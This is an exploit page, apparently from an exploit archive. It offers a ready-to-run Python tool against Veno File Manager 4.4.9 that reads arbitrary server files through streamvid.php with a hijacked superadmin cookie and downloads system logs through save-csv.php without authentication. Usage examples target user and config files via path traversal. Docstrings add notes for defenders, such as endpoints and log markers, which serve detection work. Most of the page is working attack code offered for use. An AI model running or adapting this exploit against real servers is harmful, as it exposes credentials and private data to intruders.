## https://sploitus.com/exploit?id=PACKETSTORM:223857
==================================================================================================================================
    | # Title     : Veno File Manager 4.4.9 - Exploit Tool                                                                           |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://veno.es/updates/logs/?slug=vfm/                                                                          |
    ==================================================================================================================================
    
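    [+] Summary    : This script is a proof-of-concept for two security issues reported in Veno File Manager 4.4.9:
                     1. Authenticated file disclosure: with a valid superadmin session cookie, arbitrary server files can be read.
                     2. Unauthenticated log access: system logs can be downloaded without logging in.
                     The script sends HTTP requests to the affected endpoints, prints the data returned, and saves downloaded logs locally for analysis.
                     For defenders: the endpoints involved are /vfm-admin/ajax/streamvid.php (the "vid" parameter carries the base64-encoded file path) and
                     /vfm-admin/admin-panel/view/analytics/save-csv.php. Review access logs for requests to both, and confirm that each one enforces an authenticated admin session on the server side.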
    
    [+] PoC        :
    
    #!/usr/bin/env python3
    
    import requests
    import base64
    import sys
    import argparse
    from urllib.parse import urljoin
    
    class VFMExploit:
        """Proof-of-concept client for two issues reported in Veno File Manager 4.4.9.

        The class wraps one ``requests.Session`` and exposes one method per issue
        plus a dispatcher (``exploit_all``).

        Notes for anyone reading this as a detection or triage reference:

        * Every request that passes ``verify=False`` skips TLS certificate
          validation.
        * Each endpoint path below begins with ``/``, so ``urljoin`` resolves it
          against the host root and drops any path component of ``target_url``.
          When searching access logs for this script's traffic, match on the
          endpoint suffix rather than on an install prefix.
        * The status markers inside the ``print`` strings are mis-encoded on this
          page (presumably a check mark and a cross); they are reproduced as-is.
        """

        def __init__(self, target_url):
            # One session is shared by all requests, so cookies set by the server
            # in one flow are sent again in the next.
            self.session = requests.Session()
            self.target_url = target_url.rstrip('/')

        def disclose_file_authenticated(self, cookie_name, cookie_value, file_path):
            """Issue 1: file disclosure through ``streamvid.php``.

            The page describes this issue as requiring superadmin privileges; the
            caller supplies the session cookie name and value.

            The flow is two requests: a POST to ``/vfm-admin/index.php`` with
            ``starting_dir=./``, then a GET to ``/vfm-admin/ajax/streamvid.php``
            whose ``vid`` parameter is ``file_path`` encoded as base64. Decoding
            ``vid`` values found in access logs shows which paths were requested.

            Returns the response body as text on HTTP 200, otherwise ``None``.
            Neither request sets a timeout, and no exception is handled here.
            """
            print(f"[*] Attempting to read file: {file_path}")
            auth_cookies = {cookie_name: cookie_value}

            print("[*] Step 1: Changing initial directory to ./")
            admin_index = urljoin(self.target_url, "/vfm-admin/index.php")
            # The reply to this POST is never inspected; a rejected session only
            # becomes visible through the status code of the GET that follows.
            self.session.post(
                admin_index,
                cookies=auth_cookies,
                data={"starting_dir": "./"},
                verify=False,
            )

            print("[*] Step 2: Reading file via streamvid.php")
            vid_token = base64.b64encode(file_path.encode()).decode()
            stream_url = urljoin(
                self.target_url,
                f"/vfm-admin/ajax/streamvid.php?vid={vid_token}",
            )
            reply = self.session.get(stream_url, cookies=auth_cookies, verify=False)

            # Success is judged on the status code alone; the body is not checked,
            # so an error or login page served with 200 is reported as a success.
            if reply.status_code != 200:
                print(f"[โœ—] Extraction failed. Status code: {reply.status_code}")
                return None

            rule = "=" * 50
            print("[โœ“] File extracted successfully!")
            print(rule)
            print(reply.text)
            print(rule)
            return reply.text

        def download_logs_unauthenticated(self, start_date):
            """Issue 2: log export through ``save-csv.php`` without a login.

            Sends one POST to
            ``/vfm-admin/admin-panel/view/analytics/save-csv.php`` with ``logsince``
            set to ``start_date`` and ``loguntil`` fixed to ``3000-12-31``. No
            cookie argument is passed. The constant far-future ``loguntil`` value
            is a convenient marker when looking for this script in request logs.

            On HTTP 200 with a non-empty body, a preview is printed, the full body
            is written to ``logs_<start_date>.csv`` in the current directory, and
            the body is returned. Any other outcome, including any exception
            raised inside the ``try`` block, prints a message and returns ``None``.
            """
            print(f"[*] Attempting to download logs since date: {start_date}")
            export_url = urljoin(
                self.target_url,
                "/vfm-admin/admin-panel/view/analytics/save-csv.php",
            )
            form = {"logsince": start_date, "loguntil": "3000-12-31"}

            try:
                reply = self.session.post(export_url, data=form, verify=False, timeout=30)
                if reply.status_code != 200 or len(reply.text) == 0:
                    print("[โœ—] No logs found or download failed")
                    return None

                # The message says "bytes", but the figure is the character count
                # of the decoded text.
                total = len(reply.text)
                rule = "=" * 50
                print(f"[โœ“] Logs downloaded successfully! ({total} bytes)")
                print(rule)
                print(reply.text[:2000])  # preview is capped at 2000 characters
                if total > 2000:
                    print(f"\n... and {total-2000} more characters remaining")
                print(rule)

                # start_date is interpolated into the local file name unchanged.
                filename = f"logs_{start_date}.csv"
                with open(filename, 'w', encoding='utf-8') as out:
                    out.write(reply.text)
                print(f"[*] Logs saved to file: {filename}")
                return reply.text
            except Exception as e:
                print(f"[โœ—] Error: {e}")
                return None

        def exploit_all(self, cookie_name=None, cookie_value=None, file_path=None, start_date=None):
            """Run whichever flows have all of their inputs supplied.

            The file-disclosure flow runs only when ``cookie_name``,
            ``cookie_value`` and ``file_path`` are all truthy; the log-download
            flow runs only when ``start_date`` is truthy.

            Returns a dict holding ``'file_disclosure'`` and/or ``'logs_download'``
            for the flows that ran. It is empty when neither ran.
            """
            banner = "=" * 60
            print(banner)
            print("Veno File Manager 4.4.9 - Multi Exploit Tool")
            print(banner)

            results = {}
            if all((cookie_name, cookie_value, file_path)):
                print("\n[+] Executing Exploit 1: File Disclosure")
                results['file_disclosure'] = self.disclose_file_authenticated(
                    cookie_name, cookie_value, file_path
                )
            if start_date:
                print("\n[+] Executing Exploit 2: Log Download")
                results['logs_download'] = self.download_logs_unauthenticated(start_date)
            return results
    def main():
        """Parse the command line and hand the options to ``VFMExploit.exploit_all``.

        ``-u/--url`` is the only required option. Note that ``-v`` here is the
        cookie value, not a verbosity switch.
        """
        cli = argparse.ArgumentParser(
            description='Veno File Manager 4.4.9 - Exploit Tool',
            formatter_class=argparse.RawDescriptionHelpFormatter,
            epilog="""
    Examples:
      python exploit.py -u http://target.com/vfm -c PHPSESSID -v abc123 --file vfm-admin/_content/users/users.php
      python exploit.py -u http://target.com/vfm --logs 2024-01-01
      python exploit.py -u http://target.com/vfm -c PHPSESSID -v abc123 --file ../../config.php --logs 2024-01-01
            """
        )

        # (flags, keyword arguments) pairs, registered in the order shown by --help.
        option_specs = (
            (('-u', '--url'), {'required': True, 'help': 'Application path (e.g., http://target.com/vfm)'}),
            (('-c', '--cookie-name'), {'help': 'Session cookie name for authentication'}),
            (('-v', '--cookie-value'), {'help': 'Session cookie value for authentication'}),
            (('-f', '--file'), {'help': 'Path of the file to read (e.g., ../../config.php)'}),
            (('-l', '--logs'), {'help': 'Download logs starting from date (yyyy-mm-dd)'}),
        )
        for flags, settings in option_specs:
            cli.add_argument(*flags, **settings)
        opts = cli.parse_args()

        # The requests are made with verify=False; this silences the warning that
        # urllib3 would otherwise print for each unverified HTTPS request.
        import urllib3
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

        VFMExploit(opts.url).exploit_all(
            cookie_name=opts.cookie_name,
            cookie_value=opts.cookie_value,
            file_path=opts.file,
            start_date=opts.logs,
        )
    
    # Run the command-line entry point only when this file is executed as a
    # script, not when it is imported as a module.
    if __name__ == "__main__":
        main()
    
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================